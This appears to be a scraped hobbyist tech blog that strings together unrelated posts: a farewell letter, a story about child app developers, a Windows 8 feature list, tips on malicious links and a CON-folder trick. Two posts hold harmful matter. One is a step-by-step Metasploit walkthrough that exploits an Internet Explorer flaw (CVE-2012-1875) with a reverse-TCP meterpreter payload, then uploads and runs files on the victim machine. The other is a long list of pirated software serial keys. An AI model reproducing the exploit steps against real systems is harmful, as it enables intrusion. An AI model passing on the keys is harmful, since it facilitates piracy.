A apologist letter and calling for the Intern



Dear Readers,



I am closing this website because i feel that i am violating copyright Laws as well as putting contents for destructions instead of constructions.


Hope reader will understand and will forgive me for all the things i did till date.


Also now I am working lot on security issues and other things like creating a software that cannot be hacked, Launching VOIP server, Launching Programming tutorial website, A bid website, Developing Android software of Mobiles, proving Online Hardware (desktop) supports, Data Recovery from damage disk, final year student project development etc.



So anyone interested to join us can contact us



Author



One more reason for us to be proud to be an INDIAN...


















Lets see how many likes and comments we get for this..!!

These two young kids are not a usual kids. They are Mr Shravan Kumaran (right), Co-founder and President, Go Dimensions and Mr Sanjay Kumaran, Co-founder and CEO, at a press conference, in Chennai on Thursday.


This was their First ever Press Conference held in chennai(Tamil Nadu,India).

Meet Shravan Kumaran and his younger brother Sanjay Kumaran – two of the youngest promoters of a company. Aged only 12 and 10 respectively, Shravan is the Co-Founder and President of Go Dimensions while his brother is Co-Founder and CEO.

When most adults have trouble understanding Java code, these two kids have used the code to build mobile applications. The brothers have together developed four apps for the Apple Store, which have been downloaded more than 10,000 times from 20 countries.

Clad in grey suits and ties, these two highly-confident children demonstrated their apps to the media, on the iOS and Android platforms, for games, education and entertainment.

Students of Vaels Billabong High International School, both Shravan’s and Sanjay’s interest in computers started early at home when their father got them a desktop computer. Starting with Paint and games on the PC, the two started to make presentations at school and teachers encouraged them to do more. That’s how they turned into mobile app developers.

In the CatchMeCop game application, a convict escapes from prison and there is a nationwide hunt for the convict. The convict has to run through a desert, a beach and a maze to outsmart the cops. There are multiple levels of this application, which saw nearly 2,000 downloads in the first month of development. In fact, tech media Web site CNET has reviewed this application too.

The other three applications are Alphabet board, a learning app for the iPhone and iPad; Prayer Planet (for religious prayers of various communities) and Colour Palette, a learning app for kids to learn colours.

The apps are free for download, says Shravan. The company will make money on advertisements in their apps, he said.


**********INDIA IS GREAT*****************

30 Things That You Don't Know About Windows 8




1. A great feature introduced in Windows 8 is Genuine Center, through which you'll be able to enter or change your license key and view the status of your license genuineness.

2. Windows 8 On screen keyboard, can split in two parts and converts in Thumb Keyboard to provide easy access to all keys on a Tablet. 

3. Multitasking has been made easy and more efficient. Windows 8 runs two different UI simultaneously. 

4. Apps can communicate with each other in Windows 8. 

5. Gesture-based navigation is intuitive and fast. 

6. The most unique feature of Windows 8 is that it offer Multi-Monitor options where on one monitor you can display your start screen and the desktop on the other. 

8. Windows 8 removes the fear of PC failure as it has Push-Button Reset option. 

9. Windows 8 automatically manages to keep the PC up to date without interrupting you inthe middle of your work with the newly featured Windows Update. 

10. In Windows 8 cryptography is much easier. 

11. Windows 8 supports newly designed Smart Screen which is aset of sophisticated technologies to help protect you from malicious websites and programs. 

12. Windows 8 comes integrated with built-in drivers that support a broad range of devices, including printers, sensors, touch-input devices, and displays. 

13. Secured boot stops malware in its tracks and makes Windows8 significantly more resistant to low-level attacks. 

14. Windows 8 allows mobility and connectivity virtually from anywhere. 

15. In Windows 8 DirectAccess helps remote users to securely access resources within a corporate network. 

16. AppLocker has been enhanced with richer capabilities & enables to manage both desktop and Metro style applications. 

17. Business users can save their data from unauthorized access as Windows 8 comes preloaded with new version of BitLocker. 

18. Windows 8 introduces Windows store from where you can find the apps you want, ranging from exciting new games, to the productivity tools and many more. 

19. Windows 8 intends many new features for business users. 

20. You can set Windows 8 to auto refresh which eliminates the need of pressing F5 again and again. 

21. Windows 8 provides a reset option, which restores the PC to the state it was in when originally purchased in case a major PC failure happens. 

22. You can integrate your Windows live ID account in Windows 8, hence eliminating need of creating a separate user account locally. 

23. Windows 8 is going to feature built-in Cloud Apps and services with SkyDrive. 

24. Protecting the pre-OS environment with UEFI. 

25. Windows 8 is also likely expected to comprehend the Calling and SMS capabilities on 3Gsupported tablets. 

26. Driver developers can use the new, integrated Microsoft Visual Studio development environment to increase productivity and develop richer applications. 

27. Windows 8 supports a broadrange of app programming languages (for example, C,C++,HTML5,CSS3,DirectX 11.1,XAML). 

28. Windows 8 offers Windows Push Notification Service through which apps can receive secure messages from your website, and send them to your apps live tile or provide a notification to the user. 

29.Windows 8 integrates support for contact selection directly within Windows using its feature Contact Picker. 

30. Windows 8 supports Mobility & Connectivity on the Go for business users. 

******LIKE & SHARE******

How to Know a Malicious Link Without Clicking It



























Even the best security software can’t protect you from the headaches you’ll encounter if youclick an unsafe link. Unsafe links appear to be shortcuts to funny videos, shocking news stories, 

awesome deals, or “Like” buttons, but are really designed to steal your personal information or hijack your computer. Your friends can unknowingly pass on unsafe links in emails, Facebook posts, and instant messages. You’ll also encounter unsafe links in website ads and search results. Use these link-scanning tips to check suspicious links. All of these solutions are free, fast, and don’t require you to download anything..

Hover Over the Link-

Sometimes a link masks the website to which it links. If you hover over a link without clickingit, you’ll notice the full URL of the link’s destination in a lower corner of your browser..

Use a Link Scanner-

Link scanners are websites and plug-ins that allow you to enter the URL of a suspicious link and check it for safety. There are many free and reliable link scanners available; I suggest you try URLVoid first. URLVoid scans alink using multiple services, such as Google, MyWOT, and Norton SafeWeb, and reports the results to you quickly..

Check Out Shortened Links..

Hacking windows using MS12-037 Internet Explorer Same ID Vulnerability




Hi Readers members, Today i am going to explain how to hack the Windows system using the recent IE exploit. This article is intend to educate PenTesters.

Microsoft Internet Explorer 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka "Same ID Property Remote Code Execution Vulnerability."

 Two technologies in modern OS are used to make exploits of this sort harder: DEP (data execution prevention) and ASLR (address-space layout randomisation).

DEP is intended to prevent an application or service from executing code from a non-executable memory region. This helps prevent certain exploits that store code via a buffer overflow. (wiki)

ASLR loads software modules such as DLLs into memory at randomised locations. Moving system DLLs around makes it harder for hackers to guess where to find the library functions they need, such as URLDownloadToFile() and CreateProcess().

But DEP and ASLR don't make remote code execution attacks impossible -just trickier.

In the case of CVE-2012-1875, ASLR can be bypassed by trying to force Internet Explorer to find and load an old version of the Microsoft C runtime DLL - one which was compiled before ASLR become the norm, and
therefore doesn't support it. Whenever you load a non-ASLR DLL, even into an ASLR-enabled program, you can predict where it will end up.

And DEP is bypassed using a technique known as ROP, or return-oriented programming.

Exploit for the Internet Explorer Same ID Vulnerability (CVE-2012-1875 ) :

Requirements :

Target OS: XP3
Attacker OS : Backtrack or any PenTesting Distros

As usual , you have to create two VMs in your VirtualBox.

Preparing victim system:
Install the XP3 in one of the VM. Change the VM's Network adapter to the Host-only-adapter. (if you don't know what i am talking about, then please use this Virtualbox manual)

Preparing the Attacker system:
Update the Metasploit modules by entering the following command in Terminal:
msfupdate

Or you can download the 'ms12_037_same_id.rb' module and paste in this directory "/opt/metasploit/msf3/modules/exploits/windows/browser/"

Configuring settings for the exploit in Metasploit:
Open the Terminal and type "msfconsole" to get the Metasploit console.

Type " use exploit/windows/browser/ms12_037_same_id" in the console.

Now we have to know the list of settings available for this exploit module. In order to get the list , you can type "show options" in the console.

Command: set SRVHOST 192.168.56.10
Details: Here the 192.168.56.11 is the ip of Backtrack . You can get this ip by simply typing the "ifconfig" in the terminal.

Command: set URIPATH /
Details: The path in which our exploit will run.

As usual, we can use Reverse Tcp payload for this attack also. So type the following command in the Metasploit console:
set payload windows/meterpreter/reverse_tcp

Ok, let us launch the exploit.

Type "exploit" in the console.

Now the exploit is started. Our exploit is running at "http://192.168.56.10:8080/".

Once the victim loads the URL in his IE browser, you will get the following message in your metasploit console:

[*] Client requesting: /
[*] Using JRE ROP
[*] Sending html
[*] Sending stage (752128 bytes) to 192.168.56.12
[*] Meterpreter session 1 opened (192.168.56.10:4444 -> 192.168.56.12:1685) 


Type "sessions" to list the active sessions . Type "sessions -i 1", this will open the connection to the session with the id '1' and bring you to Meterpreter.

Now , You can control the victim system from computer using meterpreter.

For example:

'upload /Test.exe c:\\", this command will upload the Test.exe from the root('file system' dir) folder of the BT5 to the C drive of the Target.

'execute -f C:\\Test.exe", this command will run our uploaded File in the Target.

How to create CON folder in windows



Not only CON, we cannot create any of these-

CON, PRN, AUX, CLOCK$, NUL, COM1, COM2, COM3, COM4, COM5, COM6, COM7, COM8, COM9, LPT1, LPT2, LPT3, LPT4, LPT5, LPT6, LPT7, LPT8, LPT9 and more.. The reason is that con, prn, lpt1.. lpt9, etc are underlying devices from the time dos was written. So if u r allowed to create such folders, there will be an ambiguity in where to write data when the data is supposed to go to the specified devices. In other words, if i want to print something, internally what windows does is -- it will write the data to the folder prn (virtually u can call it a folder, i mean prn, con, etc are virtual folders in device level). So if we are able to create con folder, windows will get confused where to write the data, to virtual con folder or real one.

So Now, Try this...

Open the Command prompt by 
Start -> Run and typing cmd

Code:-
C:\> md \\.\c:\con

Now, Open My Computer and browse through the path where you created CON folder... Surprising.. ?? Yeah.. you have created it successfully

Now, try to delete the folder from My computer
OOPS!!! You cant delete it...

Now, try this in command prompt console

Code:-
C:\> rd \\.\c:\con 

Yeah!! You did it...


******SHARE IF YOU LIKE THIS********

ALL SOFTWARE KEYGENS



3D Studio Max 4 :::: Number: 226-19791979 / CD Key: XLSQBQ
-Adobe Golive 4 :::: GJW400R2100006-625
-Adobe InDesign :::: IPE123R12345678-337
-Adobe PageMaker 6.5 BR :::: 03-5004-201500745 
-Adobe PageMaker 7.0 :::: 1039-1121-2998-7586-7388-7545
-Adobe Premiere 6.0 :::: MBF500B7205104-998
-Adobe Premiere 7.0 PRO:::: 1132-1381-7346-2847-2617-6783
-Aldus Photo Styler 2.0 :::: 15-1001-000000001
-Adobe Framemaker 7.0 :::: 1030-1208-8265-3458-9287-7077
-Adobe Premiere 6.0 :::: MBF500B7205104-998
-Adobe Premiere 6.5 :::: MBE600R7100024-900-960
-Adobe Premiere Pro v7.0 :::: 1132-1381-7346-2847-2617-6783
-After Effects 5.5 :::: EWW470R1001999-030-259
-Aplicativos Comerciais :::: 2003 0947201
-Architectural Desktop 3.3 SERIAL :::: 400-12345678 / CD KEY: T4ED6P

-AutoCad 14 :::: 117-99703105 / W36H / C3DF32EA
-AutoCad 2002 SERIAL :::: 400-12345678 / CD KEY: T4ED6P
-CakeWalk Home Studio 2004 :::: CWHS2.20-003021
-CakeWalk Home Studio 2002 XL :::: 2002 XL CWHX1.02-002397
-CakeWalk Pyro 2003 :::: CWPY200333333 / MP3: 95F5AGFD
-CorelDraw 8 :::: DR-8XR-23969F-63
-CorelDraw 11 :::: DR11CRD-0012082-DGW
-CorelDraw 12 :::: DR12WEX - 1504397 - KTY
-Curso - Flash 4 :::: 540234330 / 55623255258 / 5279103
-Delta Translator :::: DTR2-29108-84895-00412-18
-Dicionário Michaelis V.5.0 BR :::: CD6BL9805083
-Easy CD Creator 5.2 :::: G332NB-MGJNH-ZFVPB
-Easy CD Creator 5 :::: P-7TGQ4-G06CM-N5G1L

-Easy CD Creator 6 :::: BD-JWZS4-QX3MR-0241L
-Easy Media Creator 7.0 serial :::: YN-Y7WVY-CQXG6-K3KWZ
-Enciclopédia de Tomografia Comp. LEE :::: RUSR23351
-Empresário 3 serial :::: e3co-1-co-065-00-00-m1oe111
-English Teacher :::: 03231183
-Exchange 2000 Server :::: KRJQ8-RQ822-YRMXF-6TTXC-HD2VM
-Globalink Power Translator 6.4 :::: PT6PU7-6.41-698-0474
-Guia do Sexo :::: 3746
-Houaiss :::: DHS-21771533
-Inventor 4 :::: 202-12345678 / CD KEY: G4ED6P
-James Bond 007: NightFire :::: 1740-9488245-5171152-5578
-Jurissíntese Millenium :::: JS164-29
-Kylix 3.0 :::: 6AKT-TE29VM-7GZV6D-28?Y / Aut. Key: GFW-?RW

Macromedia Studio MX :::: WSW600-59791-91721-99978
-Make Money 2.0 :::: PRF 0200153
-Mechanical Desktop 6.0 :::: 400-19791979 / CD-Key: TLSQBS
-Norton System Works 2005 :::: BBCQ-9BCY-PKCX-GJPD-GYTK-HKGJ
-Norton Inter Security 2005 :::: BBCY-PK26-GKCP-7BCM-VY22-3VMF
-Office 2000 :::: GC6J3-GTQ62-FP876-94FBR-D3DX8
-Office 2003 :::: GWH28-DGCMP-P6RC4-6J4MT-3HFDY
-Office XP Full BR :::: HXT2X-8CDBF-HYY8H-TYJ7Q-HMHHG
-Ominipage 11 :::: 2889A L00 500020
-Page Maker 7.0 :::: 1039-1121-2998-7586-7388-7545
-Photoshop 5.5 BR :::: PWB550E7100088-110
-Photoshop 6.0 BR :::: PWW600R7105467-948
-Photoshop 7.0 :::: 1045-1209-6738-4668-7696-2783
-Photoshop 8 CS :::: EWW470R1001999-030-259
-Photoshop Elements :::: 1057-4422-1198-0751-6983-5530
-Plus Windows :::: 95 411-1410701
-Project98 BR :::: 1112-1111111
-Project Server BR 2003 :::: WFDWY-XQXJF-RHRYG-BG7RQ-BBDHM
-QuarkXPress 5.0 :::: 39173027QHSKKJF3199PYJX2
-RoboHelp Enterprise 2002 :::: REF22-C3E40SHK
-ROXIO EASY CD & DVD CREATOR SUITE 6.0 :::: BD-JWZS4-QX3MR-0241L
-Seagate Crystal Reports 8.5 :::: A6A50-8900008-ZE1007S
-Seagete Crystal Reports 9.2 :::: AVS50-81SG00S-G61002U
-SIC 3.02 Serial :::: 12D2-2501-8410-32X0-6752 / Série: 060086
-Sound Forge 5 :::: 3B-9FWG9Z-T60ZYS-0QZY0D
-Ulead Vídeo Studio 8.0 :::: 81102-86000-13994421
-Via Voice :::: RPB000049301

-Visual Kit 5 V.6.0 :::: W60.000.001.425-789
-Visual Kit 5 V.7.0 2003 :::: U5R.
-Visual SouceSafe 6.0 :::: 885-2814463
-Visual Studio 6.0 :::: 111-11111
-Visual Studio.net :::: D64GG-GXY6T-V6FTR-WCPBB-2YDYB2
-Win DVD 2000 :::: GMR22WGYXPUB8LH
-Winace :::: ACEQ79TFDSWXC3H4R64
-Windows 95 :::: 28595-OEM-0005727-80940
-Windows 98 :::: KGGJF-Q3HCX-88JJV-DM3KH-VY6VQ
-Windows 98SE :::: XJ3XX-YR4CJ-TQD6J-76QJR-GJMJB
-Windows 2000 Server BR :::: M2GHT-V6YK6-P6Q9D-PRCXF-FCWXT
-Windows 2003 BR :::: JB88F-WT2Q3-DPXTT-Y8GHG-7YYQY
-Windows 2003 Server :::: QW32K-48T2T-3D2PJ-DXBWY-C6WRJ
-Windows ME :::: Q7JRD-HH6DG-RD4BK-H93DF-DQ4FG
-Windows ME Completo :::: B6BYC-6T7C3-4PXRW-2XKWB-GYV33
-Windows NT 4.0 :::: 419-0949015

-Windows XP Corporate :::: FCKGW-RHQQ2-YXRKT-8TG6W-2B7Q8
-Windows XP CORPORATE C/SP2 :::: VDDF2-JJWM3-X7P27-FRHRT-8BVHT
-Windows XP Home BR :::: K8GMG-PRV3M-VG2JH-DJJ48-RY7FV
-Windows XP Professional C/SP2 BR :::: BX6HT-MDJKW-H2J4X-BX67W-TVVFG
-Windows XP Professional - Inglês :::: FCKGW-RHQQ2-YXRKT-8TG6W-2B7Q8
-Windows XP BR :::: JB88F-WT2Q3-DPXTT-Y8GHG-7YYQY
-Windows XP Server :::: BJXGH-4TG7P-F9PRP-K6FJD-JQMPM
-Windows Server 2003 Enterprise Corporate Edition :::: JB88F-WT2Q3-DPXTT-Y8GHG-7YYQY
-Windows 2003 Standard Server :::: M6RJ9-TBJH3-9DDXM-4VX9Q-K8M8M
-Windows 2003 Web Server :::: d42x8-7mwxd-m4b76-mkyp7-cw9fd
-Windows 2003 Server Corporate 3 in 1 :::: JB88F-WT2Q3-DPXTT-Y8GHG-7YYQY
-Windows 2003 Server/Enterprise/MSDN :::: QW32K-48T2T-3D2PJ-DXBWY-C6WRJ